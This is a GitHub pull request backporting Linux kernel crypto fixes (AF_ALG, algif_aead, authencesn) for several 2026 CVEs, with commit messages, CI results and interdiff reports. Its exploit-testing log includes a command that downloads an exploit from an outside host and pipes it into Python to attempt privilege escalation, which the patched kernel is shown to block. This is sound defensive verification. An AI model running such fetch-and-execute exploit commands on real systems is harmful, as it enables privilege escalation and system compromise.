Skip to content

[rlc-9/5.14.0-611.49.1.el9_7] Multiple patches tested (10 commits)#1170

Merged
PlaidCat merged 10 commits into
rlc-9/5.14.0-611.49.1.el9_7from
{rnicolescu}_rlc-9/5.14.0-611.49.1.el9_7
May 1, 2026
Merged

[rlc-9/5.14.0-611.49.1.el9_7] Multiple patches tested (10 commits)#1170
PlaidCat merged 10 commits into
rlc-9/5.14.0-611.49.1.el9_7from
{rnicolescu}_rlc-9/5.14.0-611.49.1.el9_7

Conversation

@ciq-kernel-automation

@ciq-kernel-automation ciq-kernel-automation Bot commented May 1, 2026

Copy link
Copy Markdown

Summary

This PR has been automatically created after successful completion of all CI stages.

Exploit Testing

[rnicolescu@localhost kernel-src-tree]$ sha256sum /usr/bin/su
057d421349606ff107799446ea48f9161386a9e4bef3322e8e7b14f47ab8aab0  /usr/bin/su
[rnicolescu@localhost kernel-src-tree]$ uname -r
5.14.0-rnicolescu_rlc-9_5.14.0-611.49.1.el9_7-46a53ab9babc+
[rnicolescu@localhost kernel-src-tree]$ git log -1 HEAD --format=%h
46a53ab9babc
[rnicolescu@localhost kernel-src-tree]$ id
uid=1000(rnicolescu) gid=1000(rnicolescu) groups=1000(rnicolescu) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023
(reverse-i-search)`':                                                                                                curl https://copy.fail/exp | python3.11 && su https://copy.fail/exp | python3.11 && su
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
100   731    0   731    0     0   6585      0 --:--:-- --:--:-- --:--:--  6585
[   70.689145] alg: No test for authencesn(hmac(sha256),cbc(aes)) (authencesn(hmac(sha256-ni),cbc-aes-aesni))
Password: su: Authentication failure
Password:
[rnicolescu@localhost kernel-src-tree]$ id
uid=1000(rnicolescu) gid=1000(rnicolescu) groups=1000(rnicolescu) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023
[rnicolescu@localhost kernel-src-tree]$ sha256sum /usr/bin/su
057d421349606ff107799446ea48f9161386a9e4bef3322e8e7b14f47ab8aab0  /usr/bin/su

Commit Message(s)

crypto: af-alg - fix NULL pointer dereference in scatterwalk

jira VULN-181881
cve-pre CVE-2026-31431
commit-author Norbert Szetei <norbert@doyensec.com>
commit 62397b493e14107ae82d8b80938f293d95425bcb
commit-source centos-stream-9
crypto: algif_aead - Revert to operating out-of-place

jira VULN-181881
cve CVE-2026-31431
commit-author Herbert Xu <herbert@gondor.apana.org.au>
commit a664bf3d603dc3bdcf9ae47cc21e0daec706d7a5
commit-source centos-stream-9
crypto: af_alg - limit RX SG extraction by receive buffer budget

jira VULN-182991
cve CVE-2026-31677
commit-author Douya Le <ldy3087146292@gmail.com>
commit 8eceab19eba9dcbfd2a0daec72e1bf48aa100170
commit-source centos-stream-9
crypto: af_alg - Fix page reassignment overflow in af_alg_pull_tsgl

jira VULN-182991
cve-bf CVE-2026-31677
commit-author Herbert Xu <herbert@gondor.apana.org.au>
commit 31d00156e50ecad37f2cb6cbf04aaa9a260505ef
commit-source centos-stream-9
crypto: authencesn - reject too-short AAD (assoclen<8) to match ESP/ESN spec

jira VULN-175569
cve CVE-2026-23060
commit-author Taeyang Lee <0wn@theori.io>
commit 2397e9264676be7794f8f7f1e9763d90bd3c7335
commit-source centos-stream-9
crypto: authencesn - Do not place hiseq at end of dst for out-of-place decryption

jira VULN-181881
cve CVE-2026-31431
commit-author Herbert Xu <herbert@gondor.apana.org.au>
commit e02494114ebf7c8b42777c6cd6982f113bfdbec7
commit-source centos-stream-9
commit-note CentOS attributes this to CVE-2026-31431 but it fixes the
	same code commit as CVE-2026-23060. I defaulted to the centos
	attribution for consistency with our upstream.
crypto: authencesn - Fix src offset when decrypting in-place

jira VULN-181881
cve-bf CVE-2026-31431
commit-author Herbert Xu <herbert@gondor.apana.org.au>
commit 1f48ad3b19a9dfc947868edda0bb8e48e5b5a8fa
commit-source centos-stream-9
crypto: authencesn - reject short ahash digests during instance creation

jira VULN-181881
cve-bf CVE-2026-31431
commit-author Yucheng Lu <kanolyc@gmail.com>
commit -
commit-source-sha 5db6ef9847717329f12c5ea8aba7e9f588a980c0
commit-source centos-stream-9, cryptodev
crypto: algif_aead - Fix minimum RX size check for decryption

jira VULN-181881
cve-bf CVE-2026-31431
commit-author Herbert Xu <herbert@gondor.apana.org.au>
commit 3d14bd48e3a77091cbce637a12c2ae31b4a1687c
crypto: algif_aead - snapshot IV for async AEAD requests

jira VULN-181881
cve-bf CVE-2026-31431
commit-author Douya Le <ldy3087146292@gmail.com>
commit 5aa58c3a572b3e3b6c786953339f7978b845cc52

Test Results

✅ Build Stage

Architecture Build Time Total Time
x86_64 34m 10s 35m 5s
aarch64 18m 37s 19m 13s

✅ Boot Verification

✅ Kernel Selftests

Architecture Passed Failed Compared Against Status
x86_64 207 45 rlc-9/5.14.0-611.49.1.el9_7 ⚠️ No baseline available
aarch64 151 49 rlc-9/5.14.0-611.49.1.el9_7 ⚠️ No baseline available

✅ LTP Results

Architecture Passed Failed Compared Against Status
x86_64 1456 81 rlc-9/5.14.0-611.49.1.el9_7 ⚠️ No baseline available
aarch64 1429 82 rlc-9/5.14.0-611.49.1.el9_7 ⚠️ No baseline available

🤖 This PR was automatically generated by GitHub Actions
Run ID: 25208750892

Herbert Xu and others added 10 commits May 1, 2026 10:54
jira VULN-181881
cve-pre CVE-2026-31431
commit-author Norbert Szetei <norbert@doyensec.com>
commit 62397b4
commit-source centos-stream-9

The AF_ALG interface fails to unmark the end of a Scatter/Gather List (SGL)
when chaining a new af_alg_tsgl structure. If a sendmsg() fills an SGL
exactly to MAX_SGL_ENTS, the last entry is marked as the end. A subsequent
sendmsg() allocates a new SGL and chains it, but fails to clear the end
marker on the previous SGL's last data entry.

This causes the crypto scatterwalk to hit a premature end, returning NULL
on sg_next() and leading to a kernel panic during dereference.

Fix this by explicitly unmarking the end of the previous SGL when
performing sg_chain() in af_alg_alloc_tsgl().

Fixes: 8ff5909 ("crypto: algif_skcipher - User-space interface for skcipher operations")
	Signed-off-by: Norbert Szetei <norbert@doyensec.com>
	Signed-off-by: Herbert Xu <herbert@gondor.apana.org.au>
jira VULN-181881
cve CVE-2026-31431
commit-author Herbert Xu <herbert@gondor.apana.org.au>
commit a664bf3
commit-source centos-stream-9

This mostly reverts commit 72548b0 except for the copying of
the associated data.

There is no benefit in operating in-place in algif_aead since the
source and destination come from different mappings.  Get rid of
all the complexity added for in-place operation and just copy the
AD directly.

Fixes: 72548b0 ("crypto: algif_aead - copy AAD from src to dst")
    Reported-by: Taeyang Lee <0wn@theori.io>
    Signed-off-by: Herbert Xu <herbert@gondor.apana.org.au>
jira VULN-182991
cve CVE-2026-31677
commit-author Douya Le <ldy3087146292@gmail.com>
commit 8eceab1
commit-source centos-stream-9

Make af_alg_get_rsgl() limit each RX scatterlist extraction to the
remaining receive buffer budget.

af_alg_get_rsgl() currently uses af_alg_readable() only as a gate
before extracting data into the RX scatterlist. Limit each extraction
to the remaining af_alg_rcvbuf(sk) budget so that receive-side
accounting matches the amount of data attached to the request.

If skcipher cannot obtain enough RX space for at least one chunk while
more data remains to be processed, reject the recvmsg call instead of
rounding the request length down to zero.

Fixes: e870456 ("crypto: algif_skcipher - overhaul memory management")
    Reported-by: Yifan Wu <yifanwucs@gmail.com>
    Reported-by: Juefei Pu <tomapufckgml@gmail.com>
    Co-developed-by: Yuan Tan <yuantan098@gmail.com>
    Signed-off-by: Yuan Tan <yuantan098@gmail.com>
    Suggested-by: Xin Liu <bird@lzu.edu.cn>
    Signed-off-by: Douya Le <ldy3087146292@gmail.com>
    Signed-off-by: Ren Wei <n05ec@lzu.edu.cn>
    Signed-off-by: Herbert Xu <herbert@gondor.apana.org.au>
jira VULN-182991
cve-bf CVE-2026-31677
commit-author Herbert Xu <herbert@gondor.apana.org.au>
commit 31d0015
commit-source centos-stream-9

When page reassignment was added to af_alg_pull_tsgl the original
loop wasn't updated so it may try to reassign one more page than
necessary.

Add the check to the reassignment so that this does not happen.

Also update the comment which still refers to the obsolete offset
argument.

    Reported-by: syzbot+d23888375c2737c17ba5@syzkaller.appspotmail.com
Fixes: e870456 ("crypto: algif_skcipher - overhaul memory management")
    Signed-off-by: Herbert Xu <herbert@gondor.apana.org.au>

Signed-off-by: Herbert Xu <herbert.xu@redhat.com>
…SN spec

jira VULN-175569
cve CVE-2026-23060
commit-author Taeyang Lee <0wn@theori.io>
commit 2397e92
commit-source centos-stream-9

authencesn assumes an ESP/ESN-formatted AAD. When assoclen is shorter than
the minimum expected length, crypto_authenc_esn_decrypt() can advance past
the end of the destination scatterlist and trigger a NULL pointer dereference
in scatterwalk_map_and_copy(), leading to a kernel panic (DoS).

Add a minimum AAD length check to fail fast on invalid inputs.

Fixes: 104880a ("crypto: authencesn - Convert to new AEAD interface")
    Reported-By: Taeyang Lee <0wn@theori.io>
    Signed-off-by: Taeyang Lee <0wn@theori.io>
    Signed-off-by: Herbert Xu <herbert@gondor.apana.org.au>
…e decryption

jira VULN-181881
cve CVE-2026-31431
commit-author Herbert Xu <herbert@gondor.apana.org.au>
commit e024941
commit-source centos-stream-9
commit-note CentOS attributes this to CVE-2026-31431 but it fixes the
	same code commit as CVE-2026-23060. I defaulted to the centos
	attribution for consistency with our upstream.

When decrypting data that is not in-place (src != dst), there is
no need to save the high-order sequence bits in dst as it could
simply be re-copied from the source.

However, the data to be hashed need to be rearranged accordingly.

    Reported-by: Taeyang Lee <0wn@theori.io>
Fixes: 104880a ("crypto: authencesn - Convert to new AEAD interface")
    Signed-off-by: Herbert Xu <herbert@gondor.apana.org.au>

Thanks,

    Signed-off-by: Herbert Xu <herbert@gondor.apana.org.au>
jira VULN-181881
cve-bf CVE-2026-31431
commit-author Herbert Xu <herbert@gondor.apana.org.au>
commit 1f48ad3
commit-source centos-stream-9

The src SG list offset wasn't set properly when decrypting in-place,
fix it.

    Reported-by: Wolfgang Walter <linux@stwm.de>
Fixes: e024941 ("crypto: authencesn - Do not place hiseq at end of dst for out-of-place decryption")
    Signed-off-by: Herbert Xu <herbert@gondor.apana.org.au>
jira VULN-181881
cve-bf CVE-2026-31431
commit-author Yucheng Lu <kanolyc@gmail.com>
commit -
commit-source-sha 5db6ef9
commit-source centos-stream-9, cryptodev

authencesn requires either a zero authsize or an authsize of at least
4 bytes because the ESN encrypt/decrypt paths always move 4 bytes of
high-order sequence number data at the end of the authenticated data.

While crypto_authenc_esn_setauthsize() already rejects explicit
non-zero authsizes in the range 1..3, crypto_authenc_esn_create()
still copied auth->digestsize into inst->alg.maxauthsize without
validating it.  The AEAD core then initialized the tfm's default
authsize from that value.

As a result, selecting an ahash with digest size 1..3, such as
cbcmac(cipher_null), exposed authencesn instances whose default
authsize was invalid even though setauthsize() would have rejected the
same value.  AF_ALG could then trigger the ESN tail handling with a
too-short tag and hit an out-of-bounds access.

Reject authencesn instances whose ahash digest size is in the invalid
non-zero range 1..3 so that no tfm can inherit an unsupported default
authsize.

Fixes: f15f05b ("crypto: ccm - switch to separate cbcmac driver")
    Cc: stable@kernel.org
    Reported-by: Yifan Wu <yifanwucs@gmail.com>
    Reported-by: Juefei Pu <tomapufckgml@gmail.com>
    Co-developed-by: Yuan Tan <yuantan098@gmail.com>
    Signed-off-by: Yuan Tan <yuantan098@gmail.com>
    Suggested-by: Xin Liu <bird@lzu.edu.cn>
    Tested-by: Yuhang Zheng <z1652074432@gmail.com>
    Reviewed-by: Eric Biggers <ebiggers@kernel.org>
    Signed-off-by: Yucheng Lu <kanolyc@gmail.com>
    Signed-off-by: Ren Wei <n05ec@lzu.edu.cn>
    Signed-off-by: Herbert Xu <herbert@gondor.apana.org.au>
jira VULN-181881
cve-bf CVE-2026-31431
commit-author Herbert Xu <herbert@gondor.apana.org.au>
commit 3d14bd4

The check for the minimum receive buffer size did not take the
tag size into account during decryption.  Fix this by adding the
required extra length.

	Reported-by: syzbot+aa11561819dc42ebbc7c@syzkaller.appspotmail.com
	Reported-by: Daniel Pouzzner <douzzer@mega.nu>
Fixes: d887c52 ("crypto: algif_aead - overhaul memory management")
	Signed-off-by: Herbert Xu <herbert@gondor.apana.org.au>
(cherry picked from commit 3d14bd4)
	Signed-off-by: Jonathan Maple <jmaple@ciq.com>
jira VULN-181881
cve-bf CVE-2026-31431
commit-author Douya Le <ldy3087146292@gmail.com>
commit 5aa58c3

AF_ALG AEAD AIO requests currently use the socket-wide IV buffer during
request processing.  For async requests, later socket activity can
update that shared state before the original request has fully
completed, which can lead to inconsistent IV handling.

Snapshot the IV into per-request storage when preparing the AEAD
request, so in-flight operations no longer depend on mutable socket
state.

Fixes: d887c52 ("crypto: algif_aead - overhaul memory management")
    Cc: stable@kernel.org
    Reported-by: Yuan Tan <yuantan098@gmail.com>
    Reported-by: Yifan Wu <yifanwucs@gmail.com>
    Reported-by: Juefei Pu <tomapufckgml@gmail.com>
    Reported-by: Xin Liu <bird@lzu.edu.cn>
    Co-developed-by: Luxing Yin <tr0jan@lzu.edu.cn>
    Signed-off-by: Luxing Yin <tr0jan@lzu.edu.cn>
    Tested-by: Yucheng Lu <kanolyc@gmail.com>
    Signed-off-by: Douya Le <ldy3087146292@gmail.com>
    Signed-off-by: Ren Wei <n05ec@lzu.edu.cn>
    Signed-off-by: Herbert Xu <herbert@gondor.apana.org.au>
@ciq-kernel-automation ciq-kernel-automation Bot added the created-by-kernelci Tag PRs that were automatically created when a user branch was pushed to the repo (kernelCI) label May 1, 2026
@github-actions

github-actions Bot commented May 1, 2026

Copy link
Copy Markdown

🤖 Validation Checks In Progress Workflow run: https://github.com/ctrliq/kernel-src-tree/actions/runs/25214524511

@github-actions

github-actions Bot commented May 1, 2026

Copy link
Copy Markdown

🔍 Upstream Linux Kernel Commit Check

  • ❌ PR commit 9a6b92431e0 (crypto: authencesn - Do not place hiseq at end of dst for out-of-place decryption) references CVE-2026-31431 but
    upstream commit e02494114ebf has no CVE assigned

This is an automated message from the kernel commit checker workflow.

@github-actions

github-actions Bot commented May 1, 2026

Copy link
Copy Markdown

🔍 Interdiff Analysis

  • ⚠️ PR commit 29fa92bcccc (crypto: algif_aead - Revert to operating out-of-place) → upstream a664bf3d603d
    Differences found:
================================================================================
*    DELTA DIFFERENCES - code changes that differ between the patches          *
================================================================================

--- b/crypto/algif_aead.c
+++ b/crypto/algif_aead.c
@@ -207,13 +208,72 @@
 	/* Use the RX SGL as source (and destination) for crypto op. */
 	rsgl_src = areq->first_rsgl.sgl.sg;
 
-	err = crypto_aead_copy_sgl(null_tfm, tsgl_src, rsgl_src,
-				   ctx->aead_assoclen);
-	if (err)
-		goto free;
+	if (ctx->enc) {
+		/*
+		 * Encryption operation - The in-place cipher operation is
+		 * achieved by the following operation:
+		 *
+		 * TX SGL: AAD || PT
+		 *	    |	   |
+		 *	    | copy |
+		 *	    v	   v
+		 * RX SGL: AAD || PT || Tag
+		 */
+		err = crypto_aead_copy_sgl(null_tfm, tsgl_src,
+					   areq->first_rsgl.sgl.sg, processed);
+		if (err)
+			goto free;
+		af_alg_pull_tsgl(sk, processed, NULL, 0);
+	} else {
+		/*
+		 * Decryption operation - To achieve an in-place cipher
+		 * operation, the following  SGL structure is used:
+		 *
+		 * TX SGL: AAD || CT || Tag
+		 *	    |	   |	 ^
+		 *	    | copy |	 | Create SGL link.
+		 *	    v	   v	 |
+		 * RX SGL: AAD || CT ----+
+		 */
+
+		 /* Copy AAD || CT to RX SGL buffer for in-place operation. */
+		err = crypto_aead_copy_sgl(null_tfm, tsgl_src,
+					   areq->first_rsgl.sgl.sg, outlen);
+		if (err)
+			goto free;
+
+		/* Create TX SGL for tag and chain it to RX SGL. */
+		areq->tsgl_entries = af_alg_count_tsgl(sk, processed,
+						       processed - as);
+		if (!areq->tsgl_entries)
+			areq->tsgl_entries = 1;
+		areq->tsgl = sock_kmalloc(sk, array_size(sizeof(*areq->tsgl),
+							 areq->tsgl_entries),
+					  GFP_KERNEL);
+		if (!areq->tsgl) {
+			err = -ENOMEM;
+			goto free;
+		}
+		sg_init_table(areq->tsgl, areq->tsgl_entries);
+
+		/* Release TX SGL, except for tag data and reassign tag data. */
+		af_alg_pull_tsgl(sk, processed, areq->tsgl, processed - as);
+
+		/* chain the areq TX SGL holding the tag with RX SGL */
+		if (usedpages) {
+			/* RX SGL present */
+			struct af_alg_sgl *sgl_prev = &areq->last_rsgl->sgl;
+
+			sg_unmark_end(sgl_prev->sg + sgl_prev->npages - 1);
+			sg_chain(sgl_prev->sg, sgl_prev->npages + 1,
+				 areq->tsgl);
+		} else
+			/* no RX SGL present (e.g. authentication only) */
+			rsgl_src = areq->tsgl;
+	}
 
 	/* Initialize the crypto operation */
-	aead_request_set_crypt(&areq->cra_u.aead_req, tsgl_src,
+	aead_request_set_crypt(&areq->cra_u.aead_req, rsgl_src,
 			       areq->first_rsgl.sgl.sg, used, ctx->iv);
 	aead_request_set_ad(&areq->cra_u.aead_req, ctx->aead_assoclen);
 	aead_request_set_tfm(&areq->cra_u.aead_req, tfm);

################################################################################
!    REJECTED PATCH2 HUNKS - could not be compared; manual review needed       !
################################################################################

--- b/crypto/algif_aead.c
+++ b/crypto/algif_aead.c
@@ -26,7 +26,6 @@
 #include <crypto/internal/aead.h>
 #include <crypto/scatterwalk.h>
 #include <crypto/if_alg.h>
-#include <crypto/skcipher.h>
 #include <linux/init.h>
 #include <linux/list.h>
 #include <linux/kernel.h>
@@ -72,7 +71,7 @@
 	struct alg_sock *pask = alg_sk(psk);
 	struct af_alg_ctx *ctx = ask->private;
 	struct crypto_aead *tfm = pask->private;
-	unsigned int i, as = crypto_aead_authsize(tfm);
+	unsigned int as = crypto_aead_authsize(tfm);
 	struct af_alg_async_req *areq;
 	struct af_alg_tsgl *tsgl, *tmp;
 	struct scatterlist *rsgl_src, *tsgl_src = NULL;
@@ -182,64 +177,7 @@
 	/* Use the RX SGL as source (and destination) for crypto op. */
 	rsgl_src = areq->first_rsgl.sgl.sgt.sgl;
 
-	if (ctx->enc) {
-		/*
-		 * Encryption operation - The in-place cipher operation is
-		 * achieved by the following operation:
-		 *
-		 * TX SGL: AAD || PT
-		 *	    |	   |
-		 *	    | copy |
-		 *	    v	   v
-		 * RX SGL: AAD || PT || Tag
-		 */
-		memcpy_sglist(areq->first_rsgl.sgl.sgt.sgl, tsgl_src,
-			      processed);
-		af_alg_pull_tsgl(sk, processed, NULL, 0);
-	} else {
-		/*
-		 * Decryption operation - To achieve an in-place cipher
-		 * operation, the following  SGL structure is used:
-		 *
-		 * TX SGL: AAD || CT || Tag
-		 *	    |	   |	 ^
-		 *	    | copy |	 | Create SGL link.
-		 *	    v	   v	 |
-		 * RX SGL: AAD || CT ----+
-		 */
-
-		/* Copy AAD || CT to RX SGL buffer for in-place operation. */
-		memcpy_sglist(areq->first_rsgl.sgl.sgt.sgl, tsgl_src, outlen);
-
-		/* Create TX SGL for tag and chain it to RX SGL. */
-		areq->tsgl_entries = af_alg_count_tsgl(sk, processed,
-						       processed - as);
-		if (!areq->tsgl_entries)
-			areq->tsgl_entries = 1;
-		areq->tsgl = sock_kmalloc(sk, array_size(sizeof(*areq->tsgl),
-							 areq->tsgl_entries),
-					  GFP_KERNEL);
-		if (!areq->tsgl) {
-			err = -ENOMEM;
-			goto free;
-		}
-		sg_init_table(areq->tsgl, areq->tsgl_entries);
-
-		/* Release TX SGL, except for tag data and reassign tag data. */
-		af_alg_pull_tsgl(sk, processed, areq->tsgl, processed - as);
-
-		/* chain the areq TX SGL holding the tag with RX SGL */
-		if (usedpages) {
-			/* RX SGL present */
-			struct af_alg_sgl *sgl_prev = &areq->last_rsgl->sgl;
-			struct scatterlist *sg = sgl_prev->sgt.sgl;
-
-			sg_unmark_end(sg + sgl_prev->sgt.nents - 1);
-			sg_chain(sg, sgl_prev->sgt.nents + 1, areq->tsgl);
-		} else
-			/* no RX SGL present (e.g. authentication only) */
-			rsgl_src = areq->tsgl;
-	}
+	memcpy_sglist(rsgl_src, tsgl_src, ctx->aead_assoclen);
 
 	/* Initialize the crypto operation */
 	aead_request_set_crypt(&areq->cra_u.aead_req, rsgl_src,
@@ -242,7 +180,7 @@
 	}
 
 	/* Initialize the crypto operation */
-	aead_request_set_crypt(&areq->cra_u.aead_req, rsgl_src,
+	aead_request_set_crypt(&areq->cra_u.aead_req, tsgl_src,
 			       areq->first_rsgl.sgl.sgt.sgl, used, ctx->iv);
 	aead_request_set_ad(&areq->cra_u.aead_req, ctx->aead_assoclen);
 	aead_request_set_tfm(&areq->cra_u.aead_req, tfm);

================================================================================
*    CONTEXT DIFFERENCES - surrounding code differences between the patches    *
================================================================================

--- b/crypto/algif_aead.c
+++ b/crypto/algif_aead.c
@@ -28,5 +28,4 @@
 #include <crypto/if_alg.h>
 #include <crypto/skcipher.h>
-#include <crypto/null.h>
 #include <linux/init.h>
 #include <linux/list.h>
@@ -69,6 +69,6 @@
-	struct aead_tfm *aeadc = pask->private;
-	struct crypto_aead *tfm = aeadc->aead;
-	struct crypto_sync_skcipher *null_tfm = aeadc->null_tfm;
+	struct alg_sock *pask = alg_sk(psk);
+	struct af_alg_ctx *ctx = ask->private;
+	struct crypto_aead *tfm = pask->private;
 	unsigned int i, as = crypto_aead_authsize(tfm);
 	struct af_alg_async_req *areq;
 	struct af_alg_tsgl *tsgl, *tmp;
@@ -210,7 +184,7 @@
 	 */
 
 	/* Use the RX SGL as source (and destination) for crypto op. */
-	rsgl_src = areq->first_rsgl.sgl.sg;
+	rsgl_src = areq->first_rsgl.sgl.sgt.sgl;
 
 	if (ctx->enc) {
 		/*
@@ -223,10 +197,8 @@
 		 *	    v	   v
 		 * RX SGL: AAD || PT || Tag
 		 */
-		err = crypto_aead_copy_sgl(null_tfm, tsgl_src,
-					   areq->first_rsgl.sgl.sg, processed);
-		if (err)
-			goto free;
+		memcpy_sglist(areq->first_rsgl.sgl.sgt.sgl, tsgl_src,
+			      processed);
 		af_alg_pull_tsgl(sk, processed, NULL, 0);
 	} else {
 		/*
@@ -240,11 +212,8 @@
 		 * RX SGL: AAD || CT ----+
 		 */
 
-		 /* Copy AAD || CT to RX SGL buffer for in-place operation. */
-		err = crypto_aead_copy_sgl(null_tfm, tsgl_src,
-					   areq->first_rsgl.sgl.sg, outlen);
-		if (err)
-			goto free;
+		/* Copy AAD || CT to RX SGL buffer for in-place operation. */
+		memcpy_sglist(areq->first_rsgl.sgl.sgt.sgl, tsgl_src, outlen);
 
 		/* Create TX SGL for tag and chain it to RX SGL. */
 		areq->tsgl_entries = af_alg_count_tsgl(sk, processed,
@@ -267,10 +236,10 @@
 		if (usedpages) {
 			/* RX SGL present */
 			struct af_alg_sgl *sgl_prev = &areq->last_rsgl->sgl;
+			struct scatterlist *sg = sgl_prev->sgt.sgl;
 
-			sg_unmark_end(sgl_prev->sg + sgl_prev->npages - 1);
-			sg_chain(sgl_prev->sg, sgl_prev->npages + 1,
-				 areq->tsgl);
+			sg_unmark_end(sg + sgl_prev->sgt.nents - 1);
+			sg_chain(sg, sgl_prev->sgt.nents + 1, areq->tsgl);
 		} else
 			/* no RX SGL present (e.g. authentication only) */
 			rsgl_src = areq->tsgl;
@@ -279,5 +248,5 @@
 	/* Initialize the crypto operation */
 	aead_request_set_crypt(&areq->cra_u.aead_req, rsgl_src,
-			       areq->first_rsgl.sgl.sg, used, ctx->iv);
+			       areq->first_rsgl.sgl.sgt.sgl, used, ctx->iv);
 	aead_request_set_ad(&areq->cra_u.aead_req, ctx->aead_assoclen);
 	aead_request_set_tfm(&areq->cra_u.aead_req, tfm);
@@ -478,4 +447,4 @@
-	struct crypto_aead *tfm = aeadc->aead;
+	struct crypto_aead *tfm = pask->private;
 	unsigned int ivlen = crypto_aead_ivsize(tfm);
 
 	af_alg_pull_tsgl(sk, ctx->used, NULL, 0);
--- b/crypto/algif_skcipher.c
+++ b/crypto/algif_skcipher.c
@@ -310,7 +359,7 @@
 	struct alg_sock *pask = alg_sk(psk);
 	struct crypto_skcipher *tfm = pask->private;
 
 	af_alg_pull_tsgl(sk, ctx->used, NULL, 0);
 	sock_kzfree_s(sk, ctx->iv, crypto_skcipher_ivsize(tfm));
-	sock_kfree_s(sk, ctx, ctx->len);
-	af_alg_release_parent(sk);
+	if (ctx->state)
+		sock_kzfree_s(sk, ctx->state, crypto_skcipher_statesize(tfm));
  • ⚠️ PR commit 56d1d042ef1 (crypto: af_alg - limit RX SG extraction by receive buffer budget) → upstream 8eceab19eba9
    Differences found:
================================================================================
*    DELTA DIFFERENCES - code changes that differ between the patches          *
================================================================================

--- b/crypto/algif_skcipher.c
+++ b/crypto/algif_skcipher.c
@@ -82,14 +82,8 @@
 	 * If more buffers are to be expected to be processed, process only
 	 * full block size buffers.
 	 */
-	if (ctx->more || len < ctx->used) {
-		if (len < bs) {
-			err = -EINVAL;
-			goto free;
-		}
-
+	if (ctx->more || len < ctx->used)
 		len -= len % bs;
-	}
 
 	/*
 	 * Create a per request TX SGL for this request which tracks the

################################################################################
!    REJECTED PATCH2 HUNKS - could not be compared; manual review needed       !
################################################################################

--- b/crypto/algif_skcipher.c
+++ b/crypto/algif_skcipher.c
@@ -130,6 +130,11 @@
 	 * full block size buffers.
 	 */
 	if (ctx->more || len < ctx->used) {
+		if (len < bs) {
+			err = -EINVAL;
+			goto free;
+		}
+
 		len -= len % bs;
 		cflags |= CRYPTO_SKCIPHER_REQ_NOTFINAL;
 	}

================================================================================
*    CONTEXT DIFFERENCES - surrounding code differences between the patches    *
================================================================================

--- b/crypto/algif_skcipher.c
+++ b/crypto/algif_skcipher.c
@@ -79,7 +79,6 @@
 	 * full block size buffers.
 	 */
-	if (ctx->more || len < ctx->used)
+	if (ctx->more || len < ctx->used) {
 		len -= len % bs;
-
-	/*
-	 * Create a per request TX SGL for this request which tracks the
+		cflags |= CRYPTO_SKCIPHER_REQ_NOTFINAL;
+	}
  • ⚠️ PR commit 25bacbc4ba5 (crypto: authencesn - reject too-short AAD (assoclen<8) to match ESP/ESN spec) → upstream 2397e9264676
    Differences found:
================================================================================
*    CONTEXT DIFFERENCES - surrounding code differences between the patches    *
================================================================================

--- b/crypto/authencesn.c
+++ b/crypto/authencesn.c
@@ -275,6 +253,6 @@
 	u32 tmp[2];
 	int err;
 
 	cryptlen -= authsize;
 
-	if (req->src != dst) {
+	if (req->src != dst)
  • ⚠️ PR commit 9a6b92431e0 (crypto: authencesn - Do not place hiseq at end of dst for out-of-place decryption) → upstream e02494114ebf
    Differences found:
================================================================================
*    DELTA DIFFERENCES - code changes that differ between the patches          *
================================================================================

--- b/crypto/authencesn.c
+++ b/crypto/authencesn.c
@@ -164,10 +164,7 @@
 	authenc_esn_request_complete(areq, err);
 }
 
-static int crypto_authenc_esn_copy_sg(struct aead_request *req,
-				      struct scatterlist *src,
-				      struct scatterlist *dst,
-				      unsigned int len)
+static int crypto_authenc_esn_copy(struct aead_request *req, unsigned int len)
 {
 	struct crypto_aead *authenc_esn = crypto_aead_reqtfm(req);
 	struct crypto_authenc_esn_ctx *ctx = crypto_aead_ctx(authenc_esn);
@@ -176,16 +173,11 @@
 	skcipher_request_set_sync_tfm(skreq, ctx->null);
 	skcipher_request_set_callback(skreq, aead_request_flags(req),
 				      NULL, NULL);
-	skcipher_request_set_crypt(skreq, src, dst, len, NULL);
+	skcipher_request_set_crypt(skreq, req->src, req->dst, len, NULL);
 
 	return crypto_skcipher_encrypt(skreq);
 }
 
-static int crypto_authenc_esn_copy(struct aead_request *req, unsigned int len)
-{
-	return crypto_authenc_esn_copy_sg(req, req->src, req->dst, len);
-}
-
 static int crypto_authenc_esn_encrypt(struct aead_request *req)
 {
 	struct crypto_aead *authenc_esn = crypto_aead_reqtfm(req);
@@ -245,7 +237,6 @@
 	struct scatterlist *dst = req->dst;
 	u8 *ihash = ohash + crypto_ahash_digestsize(auth);
 	u32 tmp[2];
-	int err;
 
 	if (!authsize)
 		goto decrypt;
@@ -255,11 +246,8 @@
 		scatterwalk_map_and_copy(tmp, dst, 4, 4, 0);
 		scatterwalk_map_and_copy(tmp + 1, dst, assoclen + cryptlen, 4, 0);
 		scatterwalk_map_and_copy(tmp, dst, 0, 8, 1);
-	} else {
-		err = crypto_authenc_esn_copy(req, assoclen);
-		if (err)
-			return err;
-	}
+	} else
+		memcpy_sglist(dst, src, assoclen);
 
 	if (crypto_memneq(ihash, ohash, authsize))
 		return -EBADMSG;
@@ -308,8 +296,13 @@
 	if (assoclen < 8)
 		return -EINVAL;
 
-	if (!authsize)
-		goto tail;
+	cryptlen -= authsize;
+
+	if (req->src != dst) {
+		err = crypto_authenc_esn_copy(req, assoclen + cryptlen);
+		if (err)
+			return err;
+	}
 
 	cryptlen -= authsize;
 	scatterwalk_map_and_copy(ihash, req->src, assoclen + cryptlen,
@@ -327,10 +320,7 @@
 
 		src = scatterwalk_ffwd(areq_ctx->src, src, 8);
 		dst = scatterwalk_ffwd(areq_ctx->dst, dst, 4);
-		err = crypto_authenc_esn_copy_sg(req, src, dst,
-						 assoclen + cryptlen - 8);
-		if (err)
-			return err;
+		memcpy_sglist(dst, src, assoclen + cryptlen - 8);
 		dst = req->dst;
 	}
 

################################################################################
!    REJECTED PATCH2 HUNKS - could not be compared; manual review needed       !
################################################################################

--- b/crypto/authencesn.c
+++ b/crypto/authencesn.c
@@ -268,10 +274,8 @@
 	if (assoclen < 8)
 		return -EINVAL;
 
-	cryptlen -= authsize;
-
-	if (req->src != dst)
-		memcpy_sglist(dst, req->src, assoclen + cryptlen);
+	if (!authsize)
+		goto tail;
 
 	scatterwalk_map_and_copy(ihash, req->src, assoclen + cryptlen,
 				 authsize, 0);

================================================================================
*    CONTEXT DIFFERENCES - surrounding code differences between the patches    *
================================================================================

--- b/crypto/authencesn.c
